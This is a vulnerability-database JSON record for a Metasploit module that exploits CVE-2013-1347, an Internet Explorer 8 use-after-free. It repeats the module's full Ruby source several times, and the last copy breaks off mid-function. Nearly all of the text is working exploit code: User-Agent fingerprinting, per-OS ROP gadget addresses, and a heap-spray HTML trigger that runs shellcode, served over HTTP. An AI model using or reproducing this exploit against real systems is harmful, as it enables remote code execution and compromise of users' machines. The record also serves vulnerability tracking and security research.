{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "f78b81be9ef5cef8ddee187a9e7948cc", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.\n", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL"], "cvelist": ["CVE-2013-1347"], "lastseen": "2019-11-05T05:37:07", "history": [{"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-05-03T20:42:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/ie_cgenericelement_uaf", "reporter": "Rapid7", "references": ["#", "#", "http://www.microsoft.com/technet/security/bulletin/MS13-038.mspx", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL", "http://cvedetails.com/cve/cve-2013-1347"], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-07-02T23:17:19", "history": [], "viewCount": 28, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-07-02T23:17:19", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/ie_cgenericelement_uaf", "reporter": "Rapid7", "references": ["#", "#", "http://www.microsoft.com/technet/security/bulletin/MS13-038.mspx", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL", "http://cvedetails.com/cve/cve-2013-1347"], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-07-24T19:24:46", "history": [], "viewCount": 37, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-07-24T19:24:46", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-08-21T15:30:05", "history": [], "viewCount": 44, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-08-21T15:30:05", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-10-26T23:40:49", "history": [], "viewCount": 44, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n 